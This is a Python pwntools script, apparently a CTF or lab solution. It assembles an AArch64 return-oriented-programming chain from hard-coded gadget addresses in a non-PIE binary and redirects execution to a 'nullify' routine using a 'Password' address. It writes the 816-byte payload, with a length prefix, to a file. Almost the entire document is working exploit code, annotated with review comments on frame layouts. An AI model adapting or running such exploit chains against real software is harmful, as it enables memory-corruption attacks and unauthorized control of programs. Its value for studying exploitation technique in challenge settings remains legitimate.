from pwn import *
# ---------------------------------------------------------------------------
# Gadget addresses and target-specific offsets for the AArch64 ROP chain
# assembled at the bottom of this file.
#
# Every address is absolute (0x40xxxx .. 0x4axxxx), which is consistent with
# a non-PIE (likely statically linked) target binary -- NOTE(review): verify
# against the exact build you are targeting; none of these survive a rebuild,
# and a PIE/ASLR build would invalidate the whole chain.
#
# The names describe what each gadget is *believed* to do (registers it loads
# or stores, where it branches).  The disassembly backing those names is not
# in this file, so treat the names as documentation of intent, not proof.
# ---------------------------------------------------------------------------

# Chain entry and stack adjustment
addr_jmpgadget = 0x400758
addr_spadd48 = 0x428674          # presumably `add sp, sp, #48`-style gadget

# Register loaders (pop values from the stack into the named registers)
addr_setx0 = 0x468230
addr_setx1x3_jx3 = 0x41257c      # loads x1/x3, then branches to x3 (per name)
addr_setx2x3 = 0x400748
addr_setx19x20 = 0x42cb10
addr_setx21 = 0x46a96c
addr_subx0x20_setx19x20 = 0x429b6c

# Arithmetic / store / indirect-branch gadgets
addr_addx0x1 = 0x40de1c
addr_addx1x0_savex1_setx21x22 = 0x4296d0
addr_savex0 = 0x400734
addr_movx1sp_x0x19_jx2 = 0x428c48
addr_callx1_setx19 = 0x45bd08    # defined but not used by the chain below

# Target data and functions
addr_Password = 0x4afcb0
addr_nullify = 0x400e88          # final call target of the chain
addr_exit = 0x417b30             # defined but not used by the chain below

# Target-specific stack distance fed into x0 (see chain below)
stack_offset = 488
def setx0(x0, ret):
    """Build the 176-byte stack frame consumed by the gadget at addr_setx0.

    Layout (byte offset: content):
        0    8 bytes filler
        8    ret -- address of the gadget that runs next
        16   112 bytes filler
        128  x0  -- value the gadget loads into x0
        136  40 bytes filler

    The filler slots are whatever this gadget's epilogue pops or skips
    (saved fp / callee-saved registers, presumably); their exact meaning is
    fixed by the gadget's code, which is not visible in this file.
    """
    frame = (
        b"a" * 8,
        p64(ret),
        b"b" * 112,
        p64(x0),
        b"c" * 40,
    )
    return b"".join(frame)
def setx1x3_jx3(x1, x3):
    """Build the 128-byte stack frame consumed by the gadget at addr_setx1x3_jx3.

    Layout: 112 bytes filler, then x1, then x3.  There is no separate return
    slot: per the gadget's name it branches to x3, so x3 doubles as the
    continuation (the chain below passes addr_nullify there).
    """
    frame = b"e" * 112
    frame += p64(x1)  # loaded into x1
    frame += p64(x3)  # loaded into x3, then branched to
    return frame
def setx2x3(x2, x3, ret):
    """Build the 48-byte stack frame consumed by the gadget at addr_setx2x3.

    Layout: x2, x3, 8 bytes filler, ret (next gadget), 16 bytes filler.
    """
    return b"".join((
        p64(x2),
        p64(x3),
        b"f" * 8,
        p64(ret),
        b"g" * 16,
    ))
def addx0x1(ret):
    """Build the 16-byte stack frame for the gadget at addr_addx0x1.

    Layout: 8 bytes filler, then ret (next gadget).  The gadget takes no
    stack operands of its own; it presumably just computes x0 += x1.
    """
    return b"h" * 8 + p64(ret)
def subx0x20_setx19x20(x19, x20, ret):
    """Build the 48-byte stack frame for the gadget at addr_subx0x20_setx19x20.

    Layout: 8 bytes filler, ret (next gadget), x19, x20, 16 bytes filler.
    Note the x19/x20 values here are loaded *after* the subtraction that the
    gadget's name advertises, so the x20 used by the subtraction must already
    be in place when this frame is reached (the chain sets it via setx19x20).
    """
    parts = [b"i" * 8, p64(ret), p64(x19), p64(x20), b"j" * 16]
    return b"".join(parts)
def setx19x20(x19, x20, ret):
    """Build the 32-byte stack frame for the gadget at addr_setx19x20.

    Layout: 8 bytes filler, ret (next gadget), x19, x20.
    """
    return b"k" * 8 + p64(ret) + p64(x19) + p64(x20)
def addx1x0_savex1_setx21x22(x21, x22, ret):
    """Build the 48-byte stack frame for the gadget at addr_addx1x0_savex1_setx21x22.

    Layout: 8 bytes filler, ret (next gadget), 16 bytes filler, x21, x22.
    Per its name the gadget computes x1 = x1 + x0 and stores x1 somewhere
    before reloading x21/x22; the store destination is not visible here.
    """
    return b"".join((
        b"l" * 8,
        p64(ret),
        b"m" * 16,
        p64(x21),
        p64(x22),
    ))
def setx21(x21, ret):
    """Build the 48-byte stack frame for the gadget at addr_setx21.

    Layout: 8 bytes filler, ret (next gadget), 16 bytes filler, x21,
    8 bytes filler.
    """
    frame = b"n" * 8
    frame += p64(ret)
    frame += b"o" * 16
    frame += p64(x21)
    frame += b"p" * 8
    return frame
def savex0(ret):
    """Build the 16-byte stack frame for the gadget at addr_savex0.

    Layout: 8 bytes filler, then ret (next gadget).  The gadget takes no
    stack operands; per its name it stores x0 (destination not visible here).
    """
    return b"".join((b"q" * 8, p64(ret)))
# ---------------------------------------------------------------------------
# Assemble the chain.  Each element below is the stack frame consumed by one
# gadget, and the `ret=` inside a frame names the gadget that consumes the
# *next* frame -- so list order is execution order and must not be changed.
#
# Reconstructed intent (from gadget names only -- NOTE(review): confirm in a
# debugger): seed x0 with stack_offset and x21 with addr_Password-144, derive
# and store an address from them, then branch into addr_nullify with x1 = 1.
# The value 114514 appears to be a don't-care filler for registers the chain
# never relies on.
# ---------------------------------------------------------------------------
frames = [
    # jmpgadget frame (stack baseline - 0x28): x0 x1 x2 x3 slots; x2 = spadd48
    b"a" * 8 + b"b" * 8 + p64(addr_spadd48) + b"c" * 8,
    # spadd48 frame (stack baseline)
    b"d" * 8 + p64(addr_setx2x3) + p64(addr_jmpgadget) + b"e" * 24,
    # setx2x3 frame (stack baseline): x2 = setx0 gadget, then pivot via
    # movx1sp_x0x19_jx2 (which branches to x2)
    setx2x3(x2=addr_setx0, x3=114514, ret=addr_movx1sp_x0x19_jx2),
    # movx1sp_x0x19_jx2 -> setx0
    setx0(x0=stack_offset, ret=addr_setx21),
    setx21(x21=addr_Password - 144, ret=addr_addx1x0_savex1_setx21x22),
    addx1x0_savex1_setx21x22(x21=114514, x22=114514, ret=addr_setx0),
    setx0(x0=0, ret=addr_addx0x1),
    addx0x1(ret=addr_setx19x20),
    setx19x20(x19=114514, x20=4, ret=addr_subx0x20_setx19x20),
    subx0x20_setx19x20(x19=114514, x20=114514, ret=addr_savex0),
    savex0(ret=addr_setx1x3_jx3),
    setx1x3_jx3(x1=1, x3=addr_nullify),
]
c = b"".join(frames)  # 816 bytes with the frame sizes defined above
length = len(c)

# Output file name is a raw byte string (not valid UTF-8).  open() accepts
# bytes paths on POSIX; the name itself looks like it may be meaningful to the
# target (it resembles little-endian AArch64 instruction bytes) -- NOTE(review):
# confirm, and expect this to fail on platforms that require str paths.
filename = b'\xfd\x7b\xbe\xa9\xc0\x04'

# File format: 4-byte length prefix (p32, little-endian under pwntools'
# default context) followed by the raw chain.  Both writes are echoed to
# stdout so the produced bytes can be eyeballed.
with open(filename, "wb+") as out:
    first = p32(length)
    second = c
    written = out.write(first)
    print(written, first)
    written = out.write(second)
    print(written, second)